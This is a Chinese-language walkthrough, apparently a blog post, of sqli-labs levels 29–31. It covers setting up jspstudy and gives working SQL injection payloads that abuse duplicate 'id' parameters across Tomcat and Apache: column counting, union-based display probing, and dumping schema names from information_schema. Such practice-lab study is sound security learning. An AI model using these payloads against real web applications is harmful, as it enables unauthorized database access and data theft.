sqli-libs（29（jspstudy）-31关）

Less_29

Less-29：

需要用到jspstudy跟phpstudy

 

搭建jspstudy：

sqli-labs-master文件夹下面还有tomcat文件，这才是真正的关卡，里面的jspstudy需要搭建环境jspstudy

 

 

 

 

百度搜索PHPstudy，下载jspstudy，进行安装（安装路径不能有中文），

安装成功后，打开站点域名管理；

 

点击新增,修改网站目录，网站端口；

 

 

 

打开index.jsp文件，修改url（修改为自己的）;

 

 

  Jspstudy搭建完成！

 

补充知识：服务器两层架构

 

 

 

index.jsp?id=1&id=2请求,服务器配置情况，客户端请求首先过tomcat，tomcat解析第一个参数，接下来tomcat去请求apache（php）服务器，apache解析最后一个参数。那最终返回客户端的应该是id=2的参数。

即jsp/tomcat使用getParameter("id")获取到的是第一个值，php/apache使用$_GET["id"]获取的是第二个值，那么第一个id纯数字，第二个id的值

 

 

打开第29关：

 

 

 输入？Id=1  由图可知，less29使用‘’包裹；

 

 

 

 输入：?id=1'&id=3' order by 3--+  说明数据有三列，而且第一个id值无法注入；

 

 

 

 

 

 输入 ?id=1&id=-3' union select 1,2,3--+ 得到回显位置；

 

 

  

输入  ?id=1&id=-3' union select 1,2,group_concat(schema_name) from   information_schema.schemata--+ 得到数据库的名字；

 

 

 接下来就是常规操作，和less1基本一致。

 

 

 

 

Less_30

 

首先修改第30关url（该为自己的）

 

 

 

 

Less30使用“”包裹

输入：?id=1&id=1" --+  回显正常；

 

 

 

 输入 ?id=1&id=1"  order by 3--+  回显正常，说明有三列；

 

 

 

输入 ?id=1&id=-1"  union select 1,2,3--+ 查看回显位置；

 

 

 

 输入?id=1&id=-1"  order by  4--+    显示异常，且没有出现报错信息，说明此关无法按使用报错注入；

 

 

 接下来就是常规操作，和less1基本一致。

 

 

 

 

 

Less_31

首先修改31关的url;

 

 

 

 

Less31使用”)包裹  其他与第29关一致

 

输入 ?id=1&id=1")  回显异常，报错；

 

 

 

输入 ?id=1&id=1") --+ 回显正常；

 

 

 接下来就是常规操作，和less29基本一致。